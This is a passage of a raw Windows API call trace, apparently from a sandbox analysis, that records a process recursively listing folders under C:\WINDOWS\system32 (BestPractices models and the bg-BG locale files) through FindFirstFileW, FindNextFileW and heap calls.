lpFindFileData=0x732d10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x5497abae, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x5497abae, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2a02a, dwReserved1=0x6a27bd1c, cFileName=".", cAlternateFileName="")) returned 0x70a058 [0102.839] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x732d10 | out: lpFindFileData=0x732d10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x5497abae, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x5497abae, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2a02a, dwReserved1=0x6a27bd1c, cFileName="..", cAlternateFileName="")) returned 1 [0102.839] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x732d10 | out: lpFindFileData=0x732d10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2a02a, dwReserved1=0x6a27bd1c, cFileName="v1.0", cAlternateFileName="")) returned 1 [0102.839] lstrlenW (lpString="v1.0") returned 4 [0102.839] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x733f70 [0102.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\BestPractices\\v1.0\\*", lpFindFileData=0x733f70 | out: lpFindFileData=0x733f70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a098 [0102.842] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x733f70 | out: lpFindFileData=0x733f70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.842] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x733f70 | out: lpFindFileData=0x733f70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Models", cAlternateFileName="")) returned 1 [0102.842] lstrlenW (lpString="Models") returned 6 [0102.842] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x7351d0 [0102.843] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\BestPractices\\v1.0\\Models\\*", lpFindFileData=0x7351d0 | out: lpFindFileData=0x7351d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a0d8 [0102.843] FindNextFileW (in: hFindFile=0x70a0d8, lpFindFileData=0x7351d0 | out: lpFindFileData=0x7351d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.843] FindNextFileW (in: hFindFile=0x70a0d8, lpFindFileData=0x7351d0 | out: lpFindFileData=0x7351d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0102.843] lstrlenW (lpString="Microsoft") returned 9 [0102.843] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x736430 [0102.843] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\BestPractices\\v1.0\\Models\\Microsoft\\*", lpFindFileData=0x736430 | out: lpFindFileData=0x736430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a198 [0102.844] FindNextFileW (in: hFindFile=0x70a198, lpFindFileData=0x736430 | out: lpFindFileData=0x736430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.844] FindNextFileW (in: hFindFile=0x70a198, lpFindFileData=0x736430 | out: lpFindFileData=0x736430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0102.844] lstrlenW (lpString="Windows") returned 7 [0102.844] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x737690 [0102.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\BestPractices\\v1.0\\Models\\Microsoft\\Windows\\*", lpFindFileData=0x737690 | out: lpFindFileData=0x737690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a1d8 [0102.885] FindNextFileW (in: hFindFile=0x70a1d8, lpFindFileData=0x737690 | out: lpFindFileData=0x737690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.885] FindNextFileW (in: hFindFile=0x70a1d8, lpFindFileData=0x737690 | out: lpFindFileData=0x737690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSMQ", cAlternateFileName="")) returned 1 [0102.885] lstrlenW (lpString="MSMQ") returned 4 [0102.885] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x7388f0 [0102.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\BestPractices\\v1.0\\Models\\Microsoft\\Windows\\MSMQ\\*", lpFindFileData=0x7388f0 | out: lpFindFileData=0x7388f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a2d8 [0102.886] FindNextFileW (in: hFindFile=0x70a2d8, lpFindFileData=0x7388f0 | out: lpFindFileData=0x7388f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.886] FindNextFileW (in: hFindFile=0x70a2d8, lpFindFileData=0x7388f0 | out: lpFindFileData=0x7388f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x2424a556, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x2424a556, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.886] lstrlenW (lpString="en-US") returned 5 [0102.886] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x739b50 [0102.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\BestPractices\\v1.0\\Models\\Microsoft\\Windows\\MSMQ\\en-US\\*", lpFindFileData=0x739b50 | out: lpFindFileData=0x739b50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x2424a556, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x2424a556, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a318 [0102.887] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x739b50 | out: lpFindFileData=0x739b50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x2424a556, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x2424a556, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.887] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x739b50 | out: lpFindFileData=0x739b50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf6e0eed, ftCreationTime.dwHighDateTime=0x1d32772, ftLastAccessTime.dwLowDateTime=0xdf6e0eed, ftLastAccessTime.dwHighDateTime=0x1d32772, ftLastWriteTime.dwLowDateTime=0xdf7070e2, ftLastWriteTime.dwHighDateTime=0x1d32772, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="Msmq.psd1", cAlternateFileName="")) returned 1 [0102.887] lstrlenW (lpString="Msmq.psd1") returned 9 [0102.887] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x739b50 | out: lpFindFileData=0x739b50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf6e0eed, ftCreationTime.dwHighDateTime=0x1d32772, ftLastAccessTime.dwLowDateTime=0xdf6e0eed, ftLastAccessTime.dwHighDateTime=0x1d32772, ftLastWriteTime.dwLowDateTime=0xdf7070e2, ftLastWriteTime.dwHighDateTime=0x1d32772, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="Msmq.psd1", cAlternateFileName="")) returned 0 [0102.887] FindClose (in: hFindFile=0x70a318 | out: hFindFile=0x70a318) returned 1 [0102.887] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x739b50 | out: hHeap=0x6f0000) returned 1 [0102.887] FindNextFileW (in: hFindFile=0x70a2d8, lpFindFileData=0x7388f0 | out: lpFindFileData=0x7388f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x2424a556, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x2424a556, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0102.887] FindClose (in: hFindFile=0x70a2d8 | out: hFindFile=0x70a2d8) returned 1 [0102.887] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7388f0 | out: hHeap=0x6f0000) returned 1 [0102.887] FindNextFileW (in: hFindFile=0x70a1d8, lpFindFileData=0x737690 | out: lpFindFileData=0x737690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WebServer", cAlternateFileName="WEBSER~1")) returned 1 [0102.887] lstrlenW (lpString="WebServer") returned 9 [0102.887] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x7388f0 [0102.887] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\BestPractices\\v1.0\\Models\\Microsoft\\Windows\\WebServer\\*", lpFindFileData=0x7388f0 | out: lpFindFileData=0x7388f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a2d8 [0102.888] FindNextFileW (in: hFindFile=0x70a2d8, lpFindFileData=0x7388f0 | out: lpFindFileData=0x7388f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.888] FindNextFileW (in: hFindFile=0x70a2d8, lpFindFileData=0x7388f0 | out: lpFindFileData=0x7388f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0xffc27fe4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.888] lstrlenW (lpString="en-US") returned 5 [0102.888] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x73bb58 [0102.888] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\BestPractices\\v1.0\\Models\\Microsoft\\Windows\\WebServer\\en-US\\*", lpFindFileData=0x73bb58 | out: lpFindFileData=0x73bb58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0xffc27fe4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a318 [0102.889] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x73bb58 | out: lpFindFileData=0x73bb58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0xffc27fe4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.889] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x73bb58 | out: lpFindFileData=0x73bb58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0xffc27fe4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0102.889] FindClose (in: hFindFile=0x70a318 | out: hFindFile=0x70a318) returned 1 [0102.889] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73bb58 | out: hHeap=0x6f0000) returned 1 [0102.889] FindNextFileW (in: hFindFile=0x70a2d8, lpFindFileData=0x7388f0 | out: lpFindFileData=0x7388f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0xffc27fe4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0102.889] FindClose (in: hFindFile=0x70a2d8 | out: hFindFile=0x70a2d8) returned 1 [0102.889] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7388f0 | out: hHeap=0x6f0000) returned 1 [0102.889] FindNextFileW (in: hFindFile=0x70a1d8, lpFindFileData=0x737690 | out: lpFindFileData=0x737690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WebServer", cAlternateFileName="WEBSER~1")) returned 0 [0102.890] FindClose (in: hFindFile=0x70a1d8 | out: hFindFile=0x70a1d8) returned 1 [0102.890] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x737690 | out: hHeap=0x6f0000) returned 1 [0102.890] FindNextFileW (in: hFindFile=0x70a198, lpFindFileData=0x736430 | out: lpFindFileData=0x736430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0102.890] FindClose (in: hFindFile=0x70a198 | out: hFindFile=0x70a198) returned 1 [0102.890] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x736430 | out: hHeap=0x6f0000) returned 1 [0102.890] FindNextFileW (in: hFindFile=0x70a0d8, lpFindFileData=0x7351d0 | out: lpFindFileData=0x7351d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0102.890] FindClose (in: hFindFile=0x70a0d8 | out: hFindFile=0x70a0d8) returned 1 [0102.890] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7351d0 | out: hHeap=0x6f0000) returned 1 [0102.890] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x733f70 | out: lpFindFileData=0x733f70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Models", cAlternateFileName="")) returned 0 [0102.890] FindClose (in: hFindFile=0x70a098 | out: hFindFile=0x70a098) returned 1 [0102.890] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x733f70 | out: hHeap=0x6f0000) returned 1 [0102.890] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x732d10 | out: lpFindFileData=0x732d10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x20c0ce20, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x20c0ce20, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2a02a, dwReserved1=0x6a27bd1c, cFileName="v1.0", cAlternateFileName="")) returned 0 [0102.890] FindClose (in: hFindFile=0x70a058 | out: hFindFile=0x70a058) returned 1 [0102.890] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732d10 | out: hHeap=0x6f0000) returned 1 [0102.890] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffcc5ccd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9ecaa616, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0102.890] lstrlenW (lpString="bg-BG") returned 5 [0102.890] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x73ab50 [0102.891] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\bg-BG\\*", lpFindFileData=0x73ab50 | out: lpFindFileData=0x73ab50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffcc5ccd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9ecaa616, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d32773, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a318 [0102.892] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x73ab50 | out: lpFindFileData=0x73ab50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffcc5ccd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9ecaa616, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d32773, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.892] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x73ab50 | out: lpFindFileData=0x73ab50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x754dd9c7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x754dd9c7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x754dd9c7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x1d32773, dwReserved1=0x0, cFileName="comctl32.dll.mui", cAlternateFileName="")) returned 1 [0102.892] lstrlenW (lpString="comctl32.dll.mui") returned 16 [0102.892] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x73ab50 | out: lpFindFileData=0x73ab50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7541edc3, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7541edc3, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7541edc3, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xec00, dwReserved0=0x1d32773, dwReserved1=0x0, cFileName="comdlg32.dll.mui", cAlternateFileName="")) returned 1 [0102.892] lstrlenW (lpString="comdlg32.dll.mui") returned 16 [0102.893] FindNextFileW (in: hFindFile=0x70a318, lpFindFileData=0x73ab50 | out: 